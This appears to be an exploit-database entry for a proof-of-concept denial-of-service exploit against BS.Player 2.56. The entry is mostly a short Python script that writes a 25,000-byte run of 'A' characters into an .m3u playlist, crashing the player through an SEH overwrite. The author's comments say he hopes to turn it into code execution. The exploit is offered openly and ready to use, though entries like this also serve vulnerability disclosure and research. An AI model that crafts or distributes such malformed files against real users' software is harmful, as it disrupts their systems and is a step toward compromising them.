BS.Player 2.56 - '.m3u' / '.pls' File Processing Multiple Remote Denial of Service Vulnerabilities

Author: modpr0be
type: dos
platform: windows
port: 
date_added: 2010-09-26  
date_updated: 2017-10-16  
verified: 1  
codes: OSVDB-112368  
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raw file: 34767.py  
# source:  https://www.securityfocus.com/bid/43502/info
#
# BS.Player is prone to multiple remote denial-of-service vulnerabilities.
#
# An attacker can exploit these issues to cause an affected application to crash, denying service to legitimate users.
#
# BS.Player 2.56 is vulnerable; other versions may also be affected.
#

#!/usr/bin/python
#
# Exploit Title: BS.Player 2.56 (Build 1043) .m3u and .pls Denial of Service
# Date: September 27, 2010
# Author: modpr0be
# Software Link: http://www.bsplayer.com/bsplayer-setup.exe
# Version: 2.0.0
# Tested on: Windows XP SP3/2003
# CVE : -

# How it works?
# Open BS.Player --> Open the Playlist Window --> Load m3u/pls file --> boom!
#
# SEHandler
# bsplayer.00410041
#
# 0012F74C   00410041  A.A.  Pointer to next SEH record
# 0012F750   00410041  A.A.  SE handler
#
# I think this is a kind of unicode exploit. I'm learning this, hope it will run calc, soon.
# btw...thx corelanc0d3r (PVE) for his great exploit writing tutorial ;)
#

junk = "\x41" * 25000

file = open('blah.m3u','w')  # change it if you want to try the .pls
file.write(junk)
file.close()